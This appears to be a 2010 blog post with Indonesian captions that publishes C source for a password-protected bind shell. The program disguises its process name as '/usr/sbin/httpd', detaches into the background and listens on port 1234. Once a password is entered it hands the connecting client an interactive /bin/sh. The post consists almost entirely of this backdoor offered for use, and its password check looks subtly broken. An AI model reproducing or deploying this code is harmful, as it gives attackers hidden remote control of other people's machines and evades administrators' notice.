/*
* (original sourcenya lupa)
* edited by zam
* - Hotline -
*/
#define PORT 1234
#define PASS "******"
//#define PROMPT "hehe!\n"
#define SIP "[zam]-OK!\n"
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;
char login[50];
int main (int argc, char *argv[])
{
int i;
for(i=0;i<argc;i++) {
memset(argv[i],'\x0',strlen(argv[i]));
};
strcpy(argv[0],"/usr/sbin/httpd");
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc_des == -1)
exit(-1);
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
serv_addr.sin_port = htons(PORT);
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
if (soc_rc != 0)
exit(-1);
if (fork() != 0)
exit(0);
setpgrp();
signal(SIGHUP, SIG_IGN);
if (fork() != 0)
exit(0);
soc_rc = listen(soc_des, 5);
if (soc_rc != 0)
exit(0);
while (1) {
soc_len = sizeof(client_addr);
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
if (soc_cli < 0)
exit(0);
cli_pid = getpid();
server_pid = fork();
if (server_pid != 0) {
//write(soc_cli, PROMPT, sizeof(PROMPT));
read(soc_cli, login, sizeof(login));
if(strcmp(login, PASS, sizeof(PASS)) < 0)
exit(0);
write(soc_cli, SIP, sizeof(SIP));
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
execl("/bin/sh","sh",(char *)0);
close(soc_cli);
exit(0);
}
close(soc_cli);
}
}
Friday, July 16, 2010
Bindshell with password
Ngerti sendiri lah ini untuk apa. =))
Subscribe to:
Posts (Atom)